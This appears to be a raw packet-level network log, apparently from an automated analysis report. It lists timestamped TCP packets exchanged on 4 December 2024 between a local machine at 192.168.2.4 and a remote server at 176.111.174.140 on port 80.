                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.176304102 CET4973280192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.176336050 CET4973280192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.176517963 CET8049732176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.176534891 CET8049732176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.176568985 CET4973280192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.176584005 CET4973280192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.178015947 CET8049730176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.178042889 CET8049730176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.178072929 CET4973080192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.178092003 CET4973080192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.183602095 CET8049730176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.183686018 CET4973080192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.183686972 CET8049730176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.183731079 CET4973080192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.223056078 CET8049730176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.224819899 CET4973080192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.252288103 CET8049731176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.252330065 CET8049731176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.252461910 CET4973180192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.274380922 CET8049731176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.276740074 CET4973180192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.290947914 CET8049730176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.290985107 CET8049730176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.291018963 CET4973080192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.291055918 CET4973080192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.293100119 CET8049730176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.293173075 CET8049730176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.293234110 CET4973080192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.298008919 CET8049730176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.298079967 CET8049730176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.298144102 CET4973080192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.302786112 CET8049730176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.302845001 CET8049730176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.302925110 CET4973080192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.307641029 CET8049730176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.307684898 CET8049730176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.307703018 CET4973080192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.307727098 CET4973080192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.312413931 CET8049730176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.312447071 CET8049730176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.312469006 CET4973080192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.312486887 CET4973080192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.317213058 CET8049730176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.317280054 CET4973080192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.317286968 CET8049730176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.317331076 CET4973080192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.319231033 CET8049731176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.319317102 CET4973180192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.319349051 CET8049731176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.319474936 CET4973180192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.321980000 CET8049730176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.322030067 CET4973080192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.322161913 CET8049730176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.322207928 CET4973080192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.323544979 CET8049731176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.323595047 CET4973180192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.323617935 CET8049731176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.323924065 CET4973180192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.326805115 CET8049730176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.326849937 CET4973080192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.326886892 CET8049730176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.327085018 CET4973080192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.331718922 CET8049730176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.331777096 CET4973080192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.331834078 CET8049730176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.331876993 CET4973080192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.332055092 CET8049731176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.332101107 CET4973180192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.335254908 CET8049731176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.335347891 CET4973180192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.335417986 CET8049731176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.335475922 CET4973180192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.336395979 CET8049730176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.336453915 CET4973080192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.336478949 CET8049730176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.336678982 CET4973080192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.341413975 CET8049730176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.341507912 CET4973080192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.341545105 CET8049730176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.341614008 CET4973080192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.342753887 CET8049732176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.342773914 CET8049732176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.342832088 CET4973280192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.342890024 CET4973280192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.343754053 CET8049731176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.343811035 CET4973180192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.343857050 CET8049731176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.343956947 CET4973180192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.346158028 CET8049730176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.346224070 CET4973080192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.346227884 CET8049730176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.346285105 CET4973080192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.346858025 CET8049732176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.346947908 CET4973280192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.350955009 CET8049730176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.351036072 CET8049730176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.351089954 CET4973080192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.352327108 CET8049731176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.352385998 CET4973180192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.352400064 CET8049731176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.352441072 CET4973180192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.355798006 CET8049730176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.355880976 CET8049730176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.355966091 CET4973080192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.359515905 CET8049730176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.359534025 CET8049730176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.359589100 CET4973080192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.360948086 CET8049731176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.361006021 CET4973180192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.361016989 CET8049731176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.361062050 CET4973180192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.362915993 CET8049730176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.362937927 CET8049730176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.362974882 CET4973080192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.363003016 CET4973080192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.366636038 CET8049730176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.366689920 CET8049730176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.366791010 CET4973080192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.368818998 CET8049732176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.368942022 CET8049732176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.369009972 CET4973280192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.369381905 CET8049731176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.369434118 CET4973180192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.369503975 CET8049731176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.370172977 CET8049730176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.370223999 CET4973180192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.370223999 CET4973080192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.370284081 CET8049730176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.370323896 CET4973080192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.372997046 CET8049732176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.373109102 CET8049732176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.373164892 CET4973280192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.373776913 CET8049730176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.373828888 CET4973080192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.373888969 CET8049730176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.373930931 CET4973080192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.377482891 CET8049730176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.377557039 CET8049730176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.377576113 CET4973080192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.377604961 CET4973080192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.377944946 CET8049731176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.378012896 CET4973180192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.378034115 CET8049731176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.378076077 CET4973180192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.381473064 CET8049732176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.381524086 CET4973280192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.381592035 CET8049732176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.381650925 CET4973280192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.386537075 CET8049731176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.386641979 CET8049731176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.386699915 CET4973180192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.392002106 CET8049732176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.392154932 CET8049732176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.392214060 CET4973280192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.397777081 CET8049731176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.397836924 CET8049731176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.397854090 CET4973180192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.397881031 CET4973180192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.401364088 CET8049732176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.401416063 CET8049732176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.401495934 CET4973280192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.405287981 CET8049731176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.405308008 CET8049731176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.405363083 CET4973180192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.408863068 CET8049732176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.408902884 CET8049732176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.408961058 CET4973280192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.415436029 CET8049732176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.415539980 CET4973280192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.415596962 CET8049732176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.415652037 CET4973280192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.423855066 CET8049732176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.423926115 CET4973280192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.423974991 CET8049732176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.424058914 CET4973280192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.432404995 CET8049732176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.432482958 CET4973280192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.439793110 CET8049731176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.440639019 CET4973180192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.465900898 CET8049732176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.465939045 CET8049732176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.466042042 CET4973280192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.470164061 CET8049732176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.470288992 CET8049732176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.470346928 CET4973280192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.479252100 CET8049732176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.479358912 CET8049732176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.479414940 CET4973280192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.482547045 CET8049730176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.482630968 CET8049730176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.482702017 CET4973080192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.484091997 CET8049730176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.484149933 CET4973080192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.484664917 CET8049730176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.484693050 CET8049730176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.484719992 CET4973080192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.484738111 CET4973080192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.487828016 CET8049730176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.488008976 CET8049730176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.488096952 CET4973080192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.490264893 CET8049730176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.490353107 CET8049730176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.490403891 CET4973080192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.492944002 CET8049732176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.493022919 CET4973280192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.493767023 CET8049730176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.493845940 CET8049730176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.493900061 CET4973080192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.496711969 CET8049730176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.496777058 CET4973080192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.496818066 CET8049730176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.497209072 CET4973080192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.500250101 CET8049730176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.500336885 CET8049730176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.500396967 CET4973080192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.502844095 CET8049730176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.502897024 CET8049730176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.502918959 CET4973080192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.502966881 CET4973080192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.505986929 CET8049730176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.506045103 CET4973080192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.506061077 CET8049730176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.506102085 CET4973080192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.509025097 CET8049730176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.509100914 CET8049730176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.509186983 CET4973080192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.512396097 CET8049730176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.512469053 CET4973080192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.512635946 CET8049730176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.513125896 CET8049731176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.513190031 CET4973080192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.513256073 CET8049731176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.513292074 CET4973180192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.513292074 CET4973180192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.515491962 CET8049730176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.515580893 CET8049730176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.515630960 CET4973080192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.517570019 CET8049731176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.517887115 CET8049731176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.517945051 CET4973180192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.518620968 CET8049730176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.518663883 CET4973080192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.518718958 CET8049730176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.518764973 CET4973080192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.520844936 CET8049730176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.520946026 CET8049730176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.520996094 CET4973080192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.523385048 CET8049730176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.523458958 CET4973080192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.523461103 CET8049730176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.523502111 CET4973080192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.524835110 CET8049731176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.524854898 CET8049731176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.524904966 CET4973180192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.525645971 CET8049730176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.525697947 CET8049730176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.525744915 CET4973080192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.527976990 CET8049730176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.528003931 CET8049730176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.528042078 CET4973080192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.528076887 CET4973080192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.529860020 CET8049730176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.529943943 CET8049730176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.530018091 CET4973080192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.531023979 CET8049731176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.531079054 CET4973180192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.531131029 CET8049731176.111.174.140192.168.2.4
